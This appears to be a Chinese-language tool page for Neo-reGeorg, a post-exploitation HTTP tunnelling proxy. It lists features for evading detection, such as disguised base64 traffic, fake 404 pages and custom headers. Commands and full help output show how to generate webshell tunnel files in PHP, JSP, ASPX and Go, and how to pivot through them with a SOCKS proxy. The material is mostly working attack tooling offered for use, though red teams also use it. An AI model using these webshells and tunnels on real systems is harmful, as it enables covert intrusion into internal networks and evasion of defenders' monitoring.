【Neo-reGeorg】一款重构reGeorg项目的强大代理工具

1、提高可用性，避免特征检测2、提高 tunnel 连接安全性3、提高传输内容保密性4、应对更多的网络环境场景下使用

1、传输内容经过变形 base64 加密，伪装成 base64 编码2、采用 BLV （Byte-LengthOffset-Value） 数据格式传输数据3、直接请求响应可定制化 (如伪装的404页面)4、支持 Request 模板5、HTTP Headers 可定制化6、自定义 HTTP 响应码7、多 URL 随机请求8、服务端 DNS 解析9、兼容 python2 / python310、服务端环境的高兼容性，如服务器不稳定、负载均衡下只在部分机器上部署了服务端等特殊情况11、（仅 php） 参考 pivotnacci 实现单 Session 创建多 TCP 连接，应对部分负载均衡场景12、aspx/ashx/jsp/jspx 已不再依赖 Session，可在无 Cookie 等恶劣环境正常运行13、（非 php） 支持内网转发，应对负载均衡环境14、支持进程形式启动服务端，应对更多场景

$ python neoreg.py generate -k password    [+] Create neoreg server files:       => neoreg_servers/tunnel.jsp       => neoreg_servers/tunnel.jspx       => neoreg_servers/tunnel.ashx       => neoreg_servers/tunnel.aspx       => neoreg_servers/tunnel.php       => neoreg_servers/tunnel.go

$ python3 neoreg.py -k password -u http://xx/tunnel.php+------------------------------------------------------------------------+  Log Level set to [DEBUG]  Starting socks server [127.0.0.1:1080]  Tunnel at:    http://xx/tunnel.php+------------------------------------------------------------------------+

$ python neoreg.py generate -k <you_password> --file 404.html --httpcode 404$ python neoreg.py -k <you_password> -u <server_url> --skip

$ python neoreg.py -k <you_password> -u <server_url> --proxy socks5://10.1.1.1:8080

$ python neoreg.py -k <you_password> -u <server_url> -H 'Authorization: cm9vdDppcyB0d2VsdmU=' --cookie "key=value;key2=value2"

$ python neoreg.py -k <you_password> -u <url_1> -u <url_2> -u <url_3> ...

$ python neoreg.py -k <you_password> -u <url> -r <redirect_url>

$ python neoreg.py -k <you_password> -u <url> -t <ip:port>

# 请求内容会替换到 NEOREGBODY 中$ python3 neoreg.py -k password -T 'img=data:image/png;base64,NEOREGBODY&save=ok'$ python3 neoreg.py -k password -T 'img=data:image/png;base64,NEOREGBODY&save=ok' -u http://127.0.0.1:8000/anysting# NOTE 允许将模板内容写入文件中 -T file 即可

$ go run neoreg_servers/tunnel.go 8000$ python3 neoreg.py -k password -u http://127.0.0.1:8000/anysting

# 生成服务端脚本$ python neoreg.py generate -h    usage: neoreg.py [-h] -k KEY [-o DIR] [-f FILE] [-c CODE] [--read-buff Bytes]                     [--max-read-size KB]    Generate neoreg webshell    optional arguments:      -h, --help            show this help message and exit      -k KEY, --key KEY     Specify connection key.      -o DIR, --outdir DIR  Output directory.      -f FILE, --file FILE  Camouflage html page file      -c CODE, --httpcode CODE                            Specify HTTP response code. When using -r, it is                            recommended to <400 (default: 200)      -T STR/FILE, --request-template STR/FILE                            HTTP request template (eg:                            'img=data:image/png;base64,NEOREGBODY&save=ok')      --read-buff Bytes     Remote read buffer (default: 513)      --max-read-size KB    Remote max read size (default: 512)# 连接服务端$ python neoreg.py -h    usage: neoreg.py [-h] -u URI [-r URL] [-R] [-t IP:PORT] -k KEY [-l IP]                     [-p PORT] [-s] [-H LINE] [-c LINE] [-x LINE]                     [--php] [--php-connect-timeout S] [--local-dns] [--read-buff KB]                     [--read-interval MS] [--write-interval MS] [--max-threads N]                     [--max-retry N] [--cut-left N] [--cut-right N]                     [--extract EXPR] [-v]    Socks server for Neoreg HTTP(s) tunneller (DEBUG MODE: -k debug)    optional arguments:      -h, --help            show this help message and exit      -u URI, --url URI     The url containing the tunnel script      -r URL, --redirect-url URL                            Intranet forwarding the designated server (only                            java/.net)      -R, --force-redirect  Forced forwarding (only -r)      -t IP:PORT, --target IP:PORT                            Network forwarding Target, After setting this                            parameter, port forwarding will be enabled      -k KEY, --key KEY     Specify connection key      -l IP, --listen-on IP                            The default listening address (default: 127.0.0.1)      -p PORT, --listen-port PORT                            The default listening port (default: 1080)      -s, --skip            Skip usability testing      -H LINE, --header LINE                            Pass custom header LINE to server      -c LINE, --cookie LINE                            Custom init cookies      -x LINE, --proxy LINE                            Proto://host[:port] Use proxy on given port      -T STR/FILE, --request-template STR/FILE                            HTTP request template (eg:                            'img=data:image/png;base64,NEOREGBODY&save=ok')      --php                 Use php connection method      --php-connect-timeout S                            PHP connect timeout (default: 0.5)      --local-dns           Use local resolution DNS      --read-buff KB        Local read buffer, max data to be sent per POST                            (default: 7, max: 50)      --read-interval MS    Read data interval in milliseconds (default: 300)      --write-interval MS   Write data interval in milliseconds (default: 200)      --max-threads N       Proxy max threads (default: 400)      --max-retry N         Proxy max threads (default: 10)      --cut-left N          Truncate the left side of the response body      --cut-right N         Truncate the right side of the response body      --extract EXPR        Manually extract BODY content (eg:                            <html><p>NEOREGBODY</p></html> )      -v                    Increase verbosity level (use -vv or more for greater                            effect)

https://github.com/L-codes

GitHub项目地址：https://github.com/L-codes/Neo-reGeorg